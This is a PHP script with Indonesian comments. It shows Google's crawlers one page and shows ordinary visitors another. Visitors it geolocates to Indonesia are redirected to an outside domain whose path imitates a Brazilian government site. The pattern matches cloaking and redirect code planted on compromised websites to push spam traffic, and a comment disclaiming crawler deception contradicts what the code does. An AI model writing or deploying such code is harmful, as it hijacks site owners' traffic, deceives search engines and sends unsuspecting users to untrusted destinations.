<?php
/* === Debug log sementara (hapus nanti) === */
ini_set('display_errors', 0);
ini_set('log_errors', 1);
ini_set('error_log', __DIR__ . '/php-error.log');
error_reporting(E_ALL);

ob_start(); // cegah "headers already sent" (BOM/CRLF di Windows)
date_default_timezone_set('Asia/Phnom_Penh');

$BASE        = __DIR__;
$FILE_PUBLIC = $BASE . '/main-public.php';
$FILE_HOME   = $BASE . '/main-home.php';

/* --- Ambil IP klien (honor proxy/CDN) --- */
function client_ip() {
    $keys = array('HTTP_CF_CONNECTING_IP','HTTP_X_FORWARDED_FOR','HTTP_X_REAL_IP','REMOTE_ADDR');
    foreach ($keys as $k) {
        if (!empty($_SERVER[$k])) {
            $val = $_SERVER[$k];
            $ip  = trim(explode(',', $val, 2)[0]);
            if (filter_var($ip, FILTER_VALIDATE_IP)) return $ip;
        }
    }
    return '0.0.0.0';
}

/* --- Country code: prioritas CF-IPCountry, fallback ip-api.com --- */
function country_code() {
    if (!empty($_SERVER['HTTP_CF_IPCOUNTRY'])) {
        return strtoupper(trim($_SERVER['HTTP_CF_IPCOUNTRY']));
    }

    $ip  = client_ip();
    $url = 'http://ip-api.com/json/' . rawurlencode($ip) . '?fields=status,countryCode';

    // 1) coba file_get_contents (kalau allow_url_fopen ON)
    $cc = '';
    $allow = function_exists('ini_get') ? ini_get('allow_url_fopen') : true;
    if ($allow) {
        $ctx  = stream_context_create(array('http' => array('timeout' => 3, 'ignore_errors' => true)));
        $resp = @file_get_contents($url, false, $ctx);
        if ($resp) {
            $data = @json_decode($resp, true);
            if (is_array($data) && isset($data['status']) && $data['status']==='success' && !empty($data['countryCode'])) {
                $cc = strtoupper($data['countryCode']);
            }
        }
    }

    // 2) fallback cURL bila tersedia
    if ($cc === '' && function_exists('curl_init')) {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);
        curl_setopt($ch, CURLOPT_TIMEOUT, 3);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_USERAGENT, 'geo-check/1.0');
        $resp = curl_exec($ch);
        curl_close($ch);
        if ($resp) {
            $data = @json_decode($resp, true);
            if (is_array($data) && isset($data['status']) && $data['status']==='success' && !empty($data['countryCode'])) {
                $cc = strtoupper($data['countryCode']);
            }
        }
    }

    return $cc; // '' kalau gagal
}

/* --- Deteksi Googlebot minimal (UA saja, tanpa DNS) --- */
function is_googlebot_light() {
    $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    $needles = array('Googlebot','Google-InspectionTool','Google-Site-Verification','AdsBot-Google');
    foreach ($needles as $n) {
        if (stripos($ua, $n) !== false) return true;
    }
    return false;
}

/* === LOGIKA ===
   Catatan: Jangan gunakan untuk "menipu" crawler. Gunakan ini untuk routing/lokalisasi yang sejalan kebijakan.
*/
if (is_googlebot_light()) {
    if (file_exists($FILE_PUBLIC)) {
        require $FILE_PUBLIC;
        exit;
    }
    header($_SERVER['SERVER_PROTOCOL'].' 503 Service Unavailable', true, 503);
    echo 'main-public.php tidak ditemukan';
    exit;
}

$cc = country_code();
if ($cc === 'ID') {
    header('Vary: CF-IPCountry, X-Forwarded-For, User-Agent', true);
    header('Location: https://pastimain.it.com/pedraazul.gov.br/', true, 302);
    exit;
}

if (file_exists($FILE_HOME)) {
    require $FILE_HOME;
    exit;
}
header($_SERVER['SERVER_PROTOCOL'].' 503 Service Unavailable', true, 503);
echo 'main-home.php tidak ditemukan';
